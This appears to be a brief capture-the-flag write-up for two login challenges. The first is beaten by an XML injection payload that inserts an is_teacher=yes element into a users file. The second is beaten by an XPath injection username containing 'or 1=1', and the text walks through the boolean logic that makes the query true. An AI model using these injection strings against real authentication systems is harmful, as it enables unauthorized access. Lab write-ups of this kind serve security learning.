XML Injection

Teacher Login 6

XML Injection Login

Welcome! Can you log in as teacher?

Current Database (users.xml)
<users></users>

Add a User
Username:

Login
Username: 

The input fields are of text type

After adding a couple of users, the db looks like:

<users><user><username>user</username><is_teacher>no</is_teacher></user><user><username>user2</username><is_teacher>no</is_teacher></user></users>

Injecting <is_teacher>yes</is_teacher> using the payload:

user3</username><is_teacher>yes</is_teacher></user><user><username>user4

The result db:

<users><user><username>user</username><is_teacher>no</is_teacher></user><user><username>user2</username><is_teacher>no</is_teacher></user><user><username>user3</username><is_teacher>yes</is_teacher></user><user><username>user4</username><is_teacher>no</is_teacher></user></users>

Logging in by "user3" gives the flag

Teacher Login 7

The previous solution doesn't work as the input is being parsed; < and > are converted into < and >

In the sever code, we observe that XPath is being used to query:

query = f"//user[username/text()='{username}' and is_teacher/text()='yes']"

XPath Injection using the follwing username:

user' or 1=1 or 'a'='a

This results in the following xpath query:

//user[username/text()='user' or 1=1 or 'a'='a' and is_teacher/text()='yes']
username = 'user' or 1=1 or 'a'='a' and is_teacher='yes'
(username = 'user' or 1=1) or ('a'='a' and is_teacher='yes')
(false or true) or (true and false)
true or false
true

Logging in gives the flag